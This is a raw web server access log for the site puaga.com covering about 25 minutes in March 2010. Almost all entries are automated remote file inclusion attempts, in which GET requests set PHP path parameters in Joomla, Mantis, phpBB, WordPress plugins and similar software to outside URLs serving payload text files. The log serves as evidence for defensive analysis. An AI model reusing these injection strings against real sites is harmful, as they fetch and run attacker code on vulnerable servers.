220.80.108.81 - - [04/Mar/2010:07:45:24 -0800] "GET /logs/access_100218.log//?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:45:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:45:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:45:25 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:45:32 -0800] "GET /logs/access_100201.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:45:38 -0800] "GET /logs/access_100201.log%20%20//SSI.php?sourcedir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:36 -0800] "GET /atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:36 -0800] "GET /logs//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:36 -0800] "GET /logs/access_100202.log%20%20//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:56 -0800] "GET /logs//include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:56 -0800] "GET /logs/access_100226.log//include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:46:56 -0800] "GET /include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:47:17 -0800] "GET /logs/access_100129.log//include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:47:26 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:47:26 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:07:47:26 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:47:56 -0800] "GET /logs/access.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:47:56 -0800] "GET /index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:07:47:56 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:47:59 -0800] "GET /atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:48:06 -0800] "GET /logs/access_100226.log//include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:48:21 -0800] "GET /logs/access_100129.log//include/lib.inc.php?site_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.160.181.181 - - [04/Mar/2010:07:48:25 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
202.160.180.183 - - [04/Mar/2010:07:48:49 -0800] "GET /orange_g/forum/viewtopic.php?p=20307 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "puaga.com"
195.190.166.35 - - [04/Mar/2010:07:49:13 -0800] "GET /logs/access_100211.log/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:49:35 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:49:36 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:49:39 -0800] "GET /logs/access_100130.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:49:40 -0800] "GET /logs/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:49:40 -0800] "GET /?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:49:40 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:49:47 -0800] "GET /logs/access_100206.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:50:16 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:50:37 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:50:37 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:50:44 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:50:44 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:50:44 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:51:03 -0800] "GET /logs/access_100214.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:51:07 -0800] "GET /logs/access_100212.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:07:51:07 -0800] "GET /logs/access_100202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:51:21 -0800] "GET /logs/access_100214.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.185.249.111 - - [04/Mar/2010:07:51:41 -0800] "GET /logs/access_100215.log/mantis/login_page.php?g_meta_include_file=http://n1ngas.110mb.com/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:51:48 -0800] "GET /logs/access_100202.log//atom.php5?page=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:51:48 -0800] "GET /logs/access_100129.log//atom.php5?page=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:53:15 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:54:01 -0800] "GET /logs/access_100128.log%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET //skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET /logs/access.log%20%20///skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET /logs///skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET //skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET /logs///skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:54:33 -0800] "GET /logs/access.log%20%20///skin/uks_gallery_v3010/template.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:55:05 -0800] "GET /logs/access_100205.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:55:05 -0800] "GET /logs/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:55:06 -0800] "GET /?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:55:18 -0800] "GET /logs/access_100226.log//include/lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:55:18 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:55:25 -0800] "GET /logs/access_100203.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:55:27 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:55:27 -0800] "GET /logs/access_100129.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:55:28 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:07:55:39 -0800] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:07:55:39 -0800] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:07:55:39 -0800] "GET /logs/access_100203.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:07:55:43 -0800] "GET /logs/access_100129.log//include/lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:55:58 -0800] "GET /logs/access_100212.log/mantis/login_page.php?g_meta_include_file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:56:22 -0800] "GET /logs/access_100215.log/mantis/login_page.php?g_meta_include_file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:56:44 -0800] "GET /logs/access_100202.log//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:56:49 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:56:49 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:56:50 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:57:02 -0800] "GET /logs/access_100129.log//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:57:11 -0800] "GET /logs/access_100202.log//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:07:57:20 -0800] "GET /logs/access_100129.log//atom.php5?page=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:07:58:26 -0800] "GET /logs/access_100203.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:07:58:26 -0800] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:07:58:26 -0800] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:59:18 -0800] "GET /logs/access_100129.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:59:18 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:07:59:20 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:59:26 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:59:26 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:59:27 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:07:59:36 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:07:59:36 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:07:59:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:07:59:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:00:03 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:00:03 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:00:27 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:00:27 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:01:19 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:01:19 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:01:19 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:08:01:32 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:08:01:33 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:08:01:33 -0800] "GET /logs/access_100129.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:01:54 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:01:56 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:08:02:36 -0800] "GET /logs/access_100224.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:08:02:39 -0800] "GET /logs/access_100202.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:02:45 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:02:48 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:03:03 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:04:44 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:04:44 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:04:44 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:04:44 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.70.32.2 - - [04/Mar/2010:08:04:45 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:06:01 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:06:02 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.176.53 - - [04/Mar/2010:08:06:10 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://ivan20.webatu.com/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:07:37 -0800] "GET /logs/access_100128.log%20%20//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:07:37 -0800] "GET /logs//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:07:37 -0800] "GET /errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:08:08:02 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:08:10:45 -0800] "GET /logs/index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [04/Mar/2010:08:10:46 -0800] "GET /index3.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:11:35 -0800] "GET /logs//login.php?dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
